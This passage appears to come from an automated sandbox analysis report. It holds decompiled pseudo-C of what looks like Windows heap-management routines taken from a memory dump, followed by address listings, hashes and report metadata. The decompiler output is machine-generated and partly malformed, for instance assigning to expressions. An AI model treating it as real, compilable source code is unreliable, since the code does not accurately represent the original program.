										E009EF48C(__eflags, _t493, _v8, _a8,  *(_t493 + 0x78) << 3, _v12, _v16, _t308 & 0x000000ff);
									}
								}
								_t279 =  *0x7ffe038a;
								__eflags = _t279;
								if(__eflags != 0) {
									_push(_t279 & 0x000000ff);
									_push(_v16);
									_push(_v12);
									L118:
									_push( *(_t493 + 0x78) << 3);
									_push(_a8);
									_push(_v8);
									_push(_t493);
									_t279 = E009EF48C(__eflags);
								}
								goto L7;
							} else {
								_t487 = _t307 + _v8;
								_t442 = _a4;
								_t487[2] =  *(_t493 + 0x54);
								_t317 = _a12;
								_t476 = _a8 + _v8;
								__eflags = _t442 + _t317 * 8 - _a8 + _v8;
								if(_t442 + _t317 * 8 == _a8 + _v8) {
									__eflags =  *(_t493 + 0x4c);
									if( *(_t493 + 0x4c) != 0) {
										_t487[1] = _t487[1] ^ _t487[0] ^  *_t487;
										 *_t487 =  *_t487 ^  *(_t493 + 0x50);
									}
									goto L73;
								}
								_t487[3] = 0;
								_t487[1] = 0;
								_t326 = (_a12 << 3) - _a8 >> 3;
								 *_t487 = _t326;
								__eflags =  *0xa277b0 - 1;
								if( *0xa277b0 >= 1) {
									__eflags = _t326 - 1;
									if(_t326 <= 1) {
										_t335 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
										__eflags =  *(_t335 + 0xc);
										if( *(_t335 + 0xc) == 0) {
											_push("HEAP: ");
											E0099373B();
										} else {
											E0099373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
										}
										_push("((LONG)FreeEntry->Size > 1)");
										E0099373B();
										E009EF826(_t421, _t476, _t487, _t493, 1);
									}
								}
								_t487[1] = 0;
								_t444 =  *((intOrPtr*)(_t421 + 0x18));
								__eflags = _t444 - _t421;
								if(_t444 == _t421) {
									_t327 = 0;
								} else {
									_t327 = (_t487 - _t421 >> 0x10) + 1;
									_a16 = _t327;
									__eflags = _t327;
									if(__eflags <= 0) {
										L99:
										_push(0);
										_push(0);
										_push(_t421);
										_push(_t487);
										_push(_t444);
										_push(3);
										E009EF840(_t421, _t444, _t476, _t487, _t493, __eflags);
										_t327 = _a16;
										L72:
										_t487[3] = _t327;
										E00957353(_t493, _t487,  *_t487 & 0x0000ffff);
										goto L73;
									}
									__eflags = _t327 - 0xfe;
									if(__eflags >= 0) {
										goto L99;
									}
								}
								goto L72;
							}
						}
					}
					L18:
					_t357 = _a4;
					_t38 = _t357 + 0x101f; // 0x101f
					_t484 = 0xfffff000;
					_t452 = _t38 & 0xfffff000;
					_t39 = _t357 + 0x28; // 0x28
					_v8 = _t452;
					__eflags = _t452 - _t39;
					if(_t452 == _t39) {
						_t452 = _t452 + 0x1000;
						_v8 = _t452;
					}
					__eflags = _v12;
					_t471 = _a12;
					if(_v12 != 0) {
						_t358 = _t357 + _t471 * 8;
					} else {
						_t358 = _t357 + _t471 * 8 - 0x10;
					}
					_t359 = _t358 & _t484;
					_a8 = _t359;
					__eflags = _t359 - _t452;
					if(_t359 < _t452) {
						goto L85;
					} else {
						_t360 = _t359 - _t452;
						__eflags = _a16;
						_a8 = _t360;
						if(_a16 != 0) {
							L26:
							__eflags = _t360;
							if(__eflags == 0) {
								L30:
								__eflags = _v12;
								if(_v12 != 0) {
									L38:
									E0095A96B(_t493, _t421, _t452 + 0xffffffe8, _t360, _a4,  &_v32);
									E00957353(_t493, _a4, _v32);
									_t363 =  *0x7ffe0380;
									__eflags = _t363;
									if(_t363 != 0) {
										__eflags =  *( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x240) & 0x00000001;
										if(__eflags != 0) {
											E009EF48C(__eflags, _t493, _v8, _a8,  *(_t493 + 0x78) << 3, 0, 0, _t363 & 0x000000ff);
										}
									}
									_t279 =  *0x7ffe038a;
									__eflags = _t279;
									if(__eflags == 0) {
										goto L7;
									} else {
										_push(_t279 & 0x000000ff);
										_push(0);
										_push(0);
										goto L118;
									}
								}
								_t488 = _t360 + _t452;
								_t456 = _a4;
								_t488[2] =  *(_t493 + 0x54);
								_t370 = _a12;
								_t479 = _t456 + _t370 * 8;
								_t360 = _a8;
								_t452 = _v8;
								_t423 = _t360 + _t452;
								__eflags = _t456 + _t370 * 8 - _t360 + _t452;
								if(_t456 + _t370 * 8 == _t360 + _t452) {
									__eflags =  *(_t493 + 0x4c);
									_t421 = _v20;
									if( *(_t493 + 0x4c) != 0) {
										_t488[1] = _t488[1] ^ _t488[0] ^  *_t488;
										 *_t488 =  *_t488 ^  *(_t493 + 0x50);
										L37:
										_t360 = _a8;
										_t452 = _v8;
										goto L38;
									}
									goto L38;
								}
								_t488[3] = 0;
								_t488[1] = 0;
								_t380 = (_a12 << 3) - _a8 - _v8 + _a4 >> 3;
								 *_t488 = _t380;
								__eflags =  *0xa277b0 - 1;
								if( *0xa277b0 >= 1) {
									__eflags = _t380 - 1;
									if(_t380 <= 1) {
										_t389 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
										__eflags =  *(_t389 + 0xc);
										if( *(_t389 + 0xc) == 0) {
											_push("HEAP: ");
											E0099373B();
										} else {
											E0099373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
										}
										_push("(LONG)FreeEntry->Size > 1");
										E0099373B();
										E009EF826(_t423, _t479, _t488, _t493, 1);
									}
								}
								_t421 = _v20;
								_t488[1] = 0;
								_t457 =  *((intOrPtr*)(_t421 + 0x18));
								__eflags = _t457 - _t421;
								if(_t457 == _t421) {
									_t381 = 0;
								} else {
									_t381 = (_t488 - _t421 >> 0x10) + 1;
									_a16 = _t381;
									__eflags = _t381;
									if(__eflags <= 0) {
										L113:
										_push(0);
										_push(0);
										_push(_t421);
										_push(_t488);
										_push(_t457);
										_push(3);
										E009EF840(_t421, _t457, _t479, _t488, _t493, __eflags);
										_t381 = _a16;
										L36:
										_t488[3] = _t381;
										E00957353(_t493, _t488,  *_t488 & 0x0000ffff);
										goto L37;
									}
									__eflags = _t381 - 0xfe;
									if(__eflags >= 0) {
										goto L113;
									}
								}
								goto L36;
							}
							 *((intOrPtr*)(_t493 + 0xf8)) =  *((intOrPtr*)(_t493 + 0xf8)) + 1;
							_t401 = E00954167(_t471, __eflags, 0xffffffff,  &_v8,  &_a8, 0x4000);
							__eflags = _t401;
							if(_t401 < 0) {
								goto L89;
							}
							__eflags =  *0x7ffe0380;
							if( *0x7ffe0380 != 0) {
								_t403 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t403 + 0x240) & 0x00000001;
								if(( *(_t403 + 0x240) & 0x00000001) != 0) {
									E009EEFE0(_t493, _v8, _a8, 6);
								}
							}
							_t360 = _a8;
							_t452 = _v8;
							goto L30;
						}
						_t471 = _v24;
						__eflags =  *((char*)(_t471 + 7)) - 3;
						if( *((char*)(_t471 + 7)) == 3) {
							goto L26;
						}
						__eflags = _t360;
						if(_t360 == 0) {
							goto L54;
						}
						__eflags = _t360 -  *((intOrPtr*)(_t493 + 0x70));
						if(_t360 <  *((intOrPtr*)(_t493 + 0x70))) {
							goto L54;
						}
						goto L26;
					}
				}
				_t480 = _a12;
				if(_t480 <  *((intOrPtr*)(_t493 + 0x70))) {
					L11:
					_push(_t480);
					_push(_a8);
					goto L12;
				}
				_t410 =  *(_t493 + 0x78) + _t480;
				if(_t410 <  *((intOrPtr*)(_t493 + 0x74)) || _t410 <  *(_t493 + 0xe0) >>  *((intOrPtr*)(_t493 + 0x130)) + 3) {
					goto L11;
				} else {
					_t420 = _a8;
					_a4 = E009529B2(_t493, _t420,  &_a12, 0);
					_t413 = _a12;
					if(_a12 - 0x201 > 0xfbff) {
						goto L13;
					} else {
						E00957353(_t493, _a4, _t413);
						_t492 =  *(_t493 + 0xe0) - ( *(_t493 + 0x78) << 3);
						_t279 =  *(_t493 + 0x128) - ( *(_t493 + 0x128) >> 3);
						if(_t492 < _t279) {
							_t426 = _t493 + 0x12c;
							_t279 =  *_t426 - ( *_t426 >> 3);
							__eflags = _t492 - _t279;
							if(_t492 > _t279) {
								_t279 = E00976372(_t493);
								 *_t426 = _t492;
								 *(_t493 + 0x128) = _t492;
							}
						}
						goto L7;
					}
				}
			}































































                                                                                                                                                              0x0096ee55
                                                                                                                                                              0x0096ee61
                                                                                                                                                              0x0096ee65
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a9a54
                                                                                                                                                              0x0096ee71
                                                                                                                                                              0x009946f2
                                                                                                                                                              0x009946f5
                                                                                                                                                              0x009946f9
                                                                                                                                                              0x009a9a5e
                                                                                                                                                              0x009a9a70
                                                                                                                                                              0x009a9a75
                                                                                                                                                              0x009a9a77
                                                                                                                                                              0x009a9a80
                                                                                                                                                              0x009a9a80
                                                                                                                                                              0x009a9a77
                                                                                                                                                              0x009946ff
                                                                                                                                                              0x00989b97
                                                                                                                                                              0x00989b97
                                                                                                                                                              0x00989b9a
                                                                                                                                                              0x00989b9c
                                                                                                                                                              0x00998909
                                                                                                                                                              0x0099890b
                                                                                                                                                              0x00989ba2
                                                                                                                                                              0x00989bb0
                                                                                                                                                              0x00989bb0
                                                                                                                                                              0x00989bb6
                                                                                                                                                              0x00989bb6
                                                                                                                                                              0x00989bbf
                                                                                                                                                              0x00989bc2
                                                                                                                                                              0x00989bc6
                                                                                                                                                              0x00989bc9
                                                                                                                                                              0x00989de5
                                                                                                                                                              0x00989dec
                                                                                                                                                              0x00989df4
                                                                                                                                                              0x00989dfa
                                                                                                                                                              0x00989dfd
                                                                                                                                                              0x00989e06
                                                                                                                                                              0x00989e0c
                                                                                                                                                              0x00989e12
                                                                                                                                                              0x00989e18
                                                                                                                                                              0x00989e1f
                                                                                                                                                              0x00989e24
                                                                                                                                                              0x00989e24
                                                                                                                                                              0x00989e24
                                                                                                                                                              0x00989e24
                                                                                                                                                              0x00989e37
                                                                                                                                                              0x00989e3a
                                                                                                                                                              0x00989bcf
                                                                                                                                                              0x00989bcf
                                                                                                                                                              0x00989bcf
                                                                                                                                                              0x00989bcf
                                                                                                                                                              0x00989bcf
                                                                                                                                                              0x00989bd3
                                                                                                                                                              0x00989bda
                                                                                                                                                              0x00989bde
                                                                                                                                                              0x00998a98
                                                                                                                                                              0x00998a9d
                                                                                                                                                              0x00998aa0
                                                                                                                                                              0x00998aa5
                                                                                                                                                              0x00998aa9
                                                                                                                                                              0x00998aab
                                                                                                                                                              0x00998913
                                                                                                                                                              0x00998915
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099891b
                                                                                                                                                              0x00998ab1
                                                                                                                                                              0x00998ab1
                                                                                                                                                              0x00998ab8
                                                                                                                                                              0x009a9a8b
                                                                                                                                                              0x009a9a8d
                                                                                                                                                              0x009a9a99
                                                                                                                                                              0x009a9a9c
                                                                                                                                                              0x009a9a9f
                                                                                                                                                              0x009a9ac1
                                                                                                                                                              0x009a9ac6
                                                                                                                                                              0x009a9aa1
                                                                                                                                                              0x009a9ab9
                                                                                                                                                              0x009a9abe
                                                                                                                                                              0x009a9acc
                                                                                                                                                              0x009a9ad1
                                                                                                                                                              0x009a9ad9
                                                                                                                                                              0x009a9ad9
                                                                                                                                                              0x009a9a8d
                                                                                                                                                              0x00998abe
                                                                                                                                                              0x00998ac2
                                                                                                                                                              0x00998ac5
                                                                                                                                                              0x00998ac8
                                                                                                                                                              0x00998c32
                                                                                                                                                              0x00998ace
                                                                                                                                                              0x00998ace
                                                                                                                                                              0x00998ace
                                                                                                                                                              0x00998ace
                                                                                                                                                              0x00998ad7
                                                                                                                                                              0x00998ad7
                                                                                                                                                              0x00998ada
                                                                                                                                                              0x00998add
                                                                                                                                                              0x009a9ae3
                                                                                                                                                              0x009a9ae3
                                                                                                                                                              0x009a9aea
                                                                                                                                                              0x009a9af0
                                                                                                                                                              0x009a9af4
                                                                                                                                                              0x009a9b00
                                                                                                                                                              0x009a9b03
                                                                                                                                                              0x009a9b07
                                                                                                                                                              0x009a9d7a
                                                                                                                                                              0x009a9d7f
                                                                                                                                                              0x009a9b0d
                                                                                                                                                              0x009a9b25
                                                                                                                                                              0x009a9b2a
                                                                                                                                                              0x009a9d85
                                                                                                                                                              0x009a9d8a
                                                                                                                                                              0x009a9d92
                                                                                                                                                              0x009a9d92
                                                                                                                                                              0x009a9af4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00998ae3
                                                                                                                                                              0x00998af2
                                                                                                                                                              0x00998af7
                                                                                                                                                              0x00998af9
                                                                                                                                                              0x009a9b30
                                                                                                                                                              0x009a9b32
                                                                                                                                                              0x009a9b35
                                                                                                                                                              0x009a9b3a
                                                                                                                                                              0x009a9b3e
                                                                                                                                                              0x009a9b57
                                                                                                                                                              0x009a9b57
                                                                                                                                                              0x00998941
                                                                                                                                                              0x00998941
                                                                                                                                                              0x00998944
                                                                                                                                                              0x009842da
                                                                                                                                                              0x009842da
                                                                                                                                                              0x009842db
                                                                                                                                                              0x0096eefb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096eefc
                                                                                                                                                              0x00998aff
                                                                                                                                                              0x00998b06
                                                                                                                                                              0x009a9b67
                                                                                                                                                              0x009a9b6a
                                                                                                                                                              0x009a9b71
                                                                                                                                                              0x009a9b80
                                                                                                                                                              0x009a9b80
                                                                                                                                                              0x009a9b71
                                                                                                                                                              0x00998b0c
                                                                                                                                                              0x00998b12
                                                                                                                                                              0x00998b15
                                                                                                                                                              0x00998b1a
                                                                                                                                                              0x00998b1c
                                                                                                                                                              0x00998b1c
                                                                                                                                                              0x00998b1c
                                                                                                                                                              0x00998b1c
                                                                                                                                                              0x00998b26
                                                                                                                                                              0x00998b2e
                                                                                                                                                              0x00998b35
                                                                                                                                                              0x00998b40
                                                                                                                                                              0x00998b43
                                                                                                                                                              0x00998b46
                                                                                                                                                              0x00998b4c
                                                                                                                                                              0x00998b4f
                                                                                                                                                              0x00998b55
                                                                                                                                                              0x00998b57
                                                                                                                                                              0x00998b57
                                                                                                                                                              0x00998b57
                                                                                                                                                              0x00998b57
                                                                                                                                                              0x00998b5d
                                                                                                                                                              0x00998b61
                                                                                                                                                              0x00998bed
                                                                                                                                                              0x00998bed
                                                                                                                                                              0x00998bf2
                                                                                                                                                              0x00998bf4
                                                                                                                                                              0x009a9c21
                                                                                                                                                              0x009a9c28
                                                                                                                                                              0x009a9c46
                                                                                                                                                              0x009a9c46
                                                                                                                                                              0x009a9c28
                                                                                                                                                              0x00998bfa
                                                                                                                                                              0x00998bff
                                                                                                                                                              0x00998c01
                                                                                                                                                              0x009a9c53
                                                                                                                                                              0x009a9c54
                                                                                                                                                              0x009a9c57
                                                                                                                                                              0x009a9d62
                                                                                                                                                              0x009a9d68
                                                                                                                                                              0x009a9d69
                                                                                                                                                              0x009a9d6c
                                                                                                                                                              0x009a9d6f
                                                                                                                                                              0x009a9d70
                                                                                                                                                              0x009a9d70
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00998b67
                                                                                                                                                              0x00998b6a
                                                                                                                                                              0x00998b71
                                                                                                                                                              0x00998b74
                                                                                                                                                              0x00998b78
                                                                                                                                                              0x00998b84
                                                                                                                                                              0x00998b86
                                                                                                                                                              0x00998b88
                                                                                                                                                              0x00998920
                                                                                                                                                              0x00998924
                                                                                                                                                              0x009a9c0a
                                                                                                                                                              0x009a9c10
                                                                                                                                                              0x009a9c10
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00998924
                                                                                                                                                              0x00998b8e
                                                                                                                                                              0x00998b92
                                                                                                                                                              0x00998b9f
                                                                                                                                                              0x00998ba2
                                                                                                                                                              0x00998ba5
                                                                                                                                                              0x00998bac
                                                                                                                                                              0x009a9b8a
                                                                                                                                                              0x009a9b8e
                                                                                                                                                              0x009a9b9a
                                                                                                                                                              0x009a9b9d
                                                                                                                                                              0x009a9ba1
                                                                                                                                                              0x009a9bc3
                                                                                                                                                              0x009a9bc8
                                                                                                                                                              0x009a9ba3
                                                                                                                                                              0x009a9bbb
                                                                                                                                                              0x009a9bc0
                                                                                                                                                              0x009a9bce
                                                                                                                                                              0x009a9bd3
                                                                                                                                                              0x009a9bdb
                                                                                                                                                              0x009a9bdb
                                                                                                                                                              0x009a9b8e
                                                                                                                                                              0x00998bb2
                                                                                                                                                              0x00998bb6
                                                                                                                                                              0x00998bb9
                                                                                                                                                              0x00998bbb
                                                                                                                                                              0x009a9be5
                                                                                                                                                              0x00998bc1
                                                                                                                                                              0x00998bc8
                                                                                                                                                              0x00998bc9
                                                                                                                                                              0x00998bcc
                                                                                                                                                              0x00998bce
                                                                                                                                                              0x009a9bec
                                                                                                                                                              0x009a9bec
                                                                                                                                                              0x009a9bee
                                                                                                                                                              0x009a9bf0
                                                                                                                                                              0x009a9bf1
                                                                                                                                                              0x009a9bf2
                                                                                                                                                              0x009a9bf3
                                                                                                                                                              0x009a9bf5
                                                                                                                                                              0x009a9bfa
                                                                                                                                                              0x00998bdf
                                                                                                                                                              0x00998bdf
                                                                                                                                                              0x00998be8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00998be8
                                                                                                                                                              0x00998bd4
                                                                                                                                                              0x00998bd9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00998bd9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00998bbb
                                                                                                                                                              0x00998b61
                                                                                                                                                              0x00998add
                                                                                                                                                              0x00989be4
                                                                                                                                                              0x00989be4
                                                                                                                                                              0x00989be7
                                                                                                                                                              0x00989bed
                                                                                                                                                              0x00989bf2
                                                                                                                                                              0x00989bf4
                                                                                                                                                              0x00989bf7
                                                                                                                                                              0x00989bfa
                                                                                                                                                              0x00989bfc
                                                                                                                                                              0x009a9c5f
                                                                                                                                                              0x009a9c65
                                                                                                                                                              0x009a9c65
                                                                                                                                                              0x00989c02
                                                                                                                                                              0x00989c06
                                                                                                                                                              0x00989c09
                                                                                                                                                              0x00989e43
                                                                                                                                                              0x00989c0f
                                                                                                                                                              0x00989c0f
                                                                                                                                                              0x00989c0f
                                                                                                                                                              0x00989c13
                                                                                                                                                              0x00989c15
                                                                                                                                                              0x00989c18
                                                                                                                                                              0x00989c1a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00989c20
                                                                                                                                                              0x00989c20
                                                                                                                                                              0x00989c22
                                                                                                                                                              0x00989c26
                                                                                                                                                              0x00989c29
                                                                                                                                                              0x00989c45
                                                                                                                                                              0x00989c45
                                                                                                                                                              0x00989c47
                                                                                                                                                              0x00989c7e
                                                                                                                                                              0x00989c7e
                                                                                                                                                              0x00989c82
                                                                                                                                                              0x00989d1b
                                                                                                                                                              0x00989d29
                                                                                                                                                              0x00989d35
                                                                                                                                                              0x00989d3a
                                                                                                                                                              0x00989d3f
                                                                                                                                                              0x00989d41
                                                                                                                                                              0x009a9d2d
                                                                                                                                                              0x009a9d34
                                                                                                                                                              0x009a9d50
                                                                                                                                                              0x009a9d50
                                                                                                                                                              0x009a9d34
                                                                                                                                                              0x00989d47
                                                                                                                                                              0x00989d4c
                                                                                                                                                              0x00989d4e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00989d54
                                                                                                                                                              0x009a9d5d
                                                                                                                                                              0x009a9d5e
                                                                                                                                                              0x009a9d60
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a9d60
                                                                                                                                                              0x00989d4e
                                                                                                                                                              0x00989c88
                                                                                                                                                              0x00989c8f
                                                                                                                                                              0x00989c92
                                                                                                                                                              0x00989c96
                                                                                                                                                              0x00989c99
                                                                                                                                                              0x00989c9c
                                                                                                                                                              0x00989c9f
                                                                                                                                                              0x00989ca2
                                                                                                                                                              0x00989ca5
                                                                                                                                                              0x00989ca7
                                                                                                                                                              0x0099892f
                                                                                                                                                              0x00998933
                                                                                                                                                              0x00998936
                                                                                                                                                              0x009a9d16
                                                                                                                                                              0x009a9d1c
                                                                                                                                                              0x00989d15
                                                                                                                                                              0x00989d15
                                                                                                                                                              0x00989d18
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00989d18
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099893c
                                                                                                                                                              0x00989cad
                                                                                                                                                              0x00989cb1
                                                                                                                                                              0x00989cc4
                                                                                                                                                              0x00989cc7
                                                                                                                                                              0x00989cca
                                                                                                                                                              0x00989cd1
                                                                                                                                                              0x009a9c96
                                                                                                                                                              0x009a9c9a
                                                                                                                                                              0x009a9ca6
                                                                                                                                                              0x009a9ca9
                                                                                                                                                              0x009a9cad
                                                                                                                                                              0x009a9ccf
                                                                                                                                                              0x009a9cd4
                                                                                                                                                              0x009a9caf
                                                                                                                                                              0x009a9cc7
                                                                                                                                                              0x009a9ccc
                                                                                                                                                              0x009a9cda
                                                                                                                                                              0x009a9cdf
                                                                                                                                                              0x009a9ce7
                                                                                                                                                              0x009a9ce7
                                                                                                                                                              0x009a9c9a
                                                                                                                                                              0x00989cd7
                                                                                                                                                              0x00989cda
                                                                                                                                                              0x00989cde
                                                                                                                                                              0x00989ce1
                                                                                                                                                              0x00989ce3
                                                                                                                                                              0x009a9cf1
                                                                                                                                                              0x00989ce9
                                                                                                                                                              0x00989cf0
                                                                                                                                                              0x00989cf1
                                                                                                                                                              0x00989cf4
                                                                                                                                                              0x00989cf6
                                                                                                                                                              0x009a9cf8
                                                                                                                                                              0x009a9cf8
                                                                                                                                                              0x009a9cfa
                                                                                                                                                              0x009a9cfc
                                                                                                                                                              0x009a9cfd
                                                                                                                                                              0x009a9cfe
                                                                                                                                                              0x009a9cff
                                                                                                                                                              0x009a9d01
                                                                                                                                                              0x009a9d06
                                                                                                                                                              0x00989d07
                                                                                                                                                              0x00989d07
                                                                                                                                                              0x00989d10
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00989d10
                                                                                                                                                              0x00989cfc
                                                                                                                                                              0x00989d01
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00989d01
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00989ce3
                                                                                                                                                              0x00989c49
                                                                                                                                                              0x00989c5e
                                                                                                                                                              0x00989c63
                                                                                                                                                              0x00989c65
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00989c6b
                                                                                                                                                              0x00989c72
                                                                                                                                                              0x009a9c73
                                                                                                                                                              0x009a9c76
                                                                                                                                                              0x009a9c7d
                                                                                                                                                              0x009a9c8c
                                                                                                                                                              0x009a9c8c
                                                                                                                                                              0x009a9c7d
                                                                                                                                                              0x00989c78
                                                                                                                                                              0x00989c7b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00989c7b
                                                                                                                                                              0x00989c2b
                                                                                                                                                              0x00989c2e
                                                                                                                                                              0x00989c32
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00989c34
                                                                                                                                                              0x00989c36
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00989c3c
                                                                                                                                                              0x00989c3f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00989c3f
                                                                                                                                                              0x00989c1a
                                                                                                                                                              0x0096ee77
                                                                                                                                                              0x0096ee7d
                                                                                                                                                              0x009842d6
                                                                                                                                                              0x009842d6
                                                                                                                                                              0x009842d7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009842d7
                                                                                                                                                              0x0096ee86
                                                                                                                                                              0x0096ee8b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096eeaa
                                                                                                                                                              0x0096eeaa
                                                                                                                                                              0x0096eeba
                                                                                                                                                              0x0096eebd
                                                                                                                                                              0x0096eecc
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096eed2
                                                                                                                                                              0x0096eed7
                                                                                                                                                              0x0096eee8
                                                                                                                                                              0x0096eef5
                                                                                                                                                              0x0096eef9
                                                                                                                                                              0x0096ef02
                                                                                                                                                              0x0096ef0f
                                                                                                                                                              0x0096ef11
                                                                                                                                                              0x0096ef13
                                                                                                                                                              0x0096ef17
                                                                                                                                                              0x0096ef1c
                                                                                                                                                              0x0096ef1e
                                                                                                                                                              0x0096ef1e
                                                                                                                                                              0x0096ef13
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096eef9
                                                                                                                                                              0x0096eecc

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                              • API String ID: 0-523794902
                                                                                                                                                              • Opcode ID: 2d3fcf3c021e71f1ee7e62b6dd79592f5a4d4f84bcf1892757b57a652b3769e3
                                                                                                                                                              • Instruction ID: 3a1921d8ccb61f477ec286835ecfb381f7303ffaa0147fe957a7415b074ff57e
                                                                                                                                                              • Opcode Fuzzy Hash: 2d3fcf3c021e71f1ee7e62b6dd79592f5a4d4f84bcf1892757b57a652b3769e3
                                                                                                                                                              • Instruction Fuzzy Hash: 40320171604689AFDB11DF68C880FBAB7F9FF45314F148459F8558B282C734EA85CBA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00957353, Relevance: 5.5, Strings: 4, Instructions: 466COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 62%
                                                                                                                                                              			E00957353(signed int _a4, signed int _a8, void* _a11, signed int _a12) {
				signed int _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed short _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed short _t197;
				signed int _t200;
				signed int _t201;
				signed int _t205;
				signed short _t206;
				signed short _t210;
				signed short _t211;
				intOrPtr _t218;
				signed short _t220;
				signed int _t221;
				signed short _t223;
				signed short* _t225;
				signed short _t226;
				signed short* _t229;
				signed short _t230;
				signed short _t237;
				signed int _t239;
				signed short _t240;
				signed short _t248;
				signed short _t249;
				signed short _t257;
				signed int _t266;
				signed short _t268;
				signed int _t269;
				signed int _t270;
				signed short* _t276;
				signed short* _t277;
				signed int _t282;
				intOrPtr _t284;
				signed int* _t286;
				signed short _t291;
				signed short _t294;
				signed short _t297;
				signed short _t298;
				signed int _t299;
				signed short _t304;
				signed int _t305;
				signed short _t307;
				signed short _t310;
				signed short _t311;
				intOrPtr _t318;
				intOrPtr _t319;
				signed short _t320;
				signed short _t321;
				signed int _t323;
				void* _t327;
				signed short _t329;
				signed int _t330;
				intOrPtr _t333;
				signed int _t335;
				signed int _t336;
				signed short _t340;
				signed short _t341;
				signed short _t342;
				signed short _t343;
				signed int _t344;
				signed int _t348;
				signed int _t350;
				intOrPtr _t353;
				signed short* _t354;

				if(_a12 == 0) {
					return _t197;
				} else {
					_push(__ebx);
					_push(__esi);
					__esi = _a8;
					_push(__edi);
					__edi = _a4;
					__ebx = ( *(__esi + 4) ^  *(__edi + 0x54)) & 0x0000ffff;
					__eflags = __bx;
					if(__bx == 0) {
						__eflags =  *0xa277b0 - 1;
						if( *0xa277b0 >= 1) {
							__eflags =  *(__esi + 2) & 0x00000008;
							if(( *(__esi + 2) & 0x00000008) == 0) {
								__esi + 0xfff = __esi + 0x00000fff & 0xfffff000;
								__eflags = (__esi + 0x00000fff & 0xfffff000) - __esi;
								if((__esi + 0x00000fff & 0xfffff000) != __esi) {
									__eax =  *[fs:0x18];
									__eax =  *( *[fs:0x18] + 0x30);
									__eflags =  *(__eax + 0xc);
									if( *(__eax + 0xc) == 0) {
										_push("HEAP: ");
										__eax = E0099373B();
									} else {
										 *[fs:0x18] =  *( *[fs:0x18] + 0x30);
										 *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc));
										 *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc)) + 0x2c = E0099373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc)) + 0x2c);
										_pop(__ecx);
									}
									_pop(__ecx);
									_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
									__eax = E0099373B();
									_pop(__ecx);
									__eax = E009EF826(__ebx, __edx, __edi, __esi, 1);
								}
							}
						}
					}
					__al =  *((intOrPtr*)(__esi + 6));
					__eflags = __al;
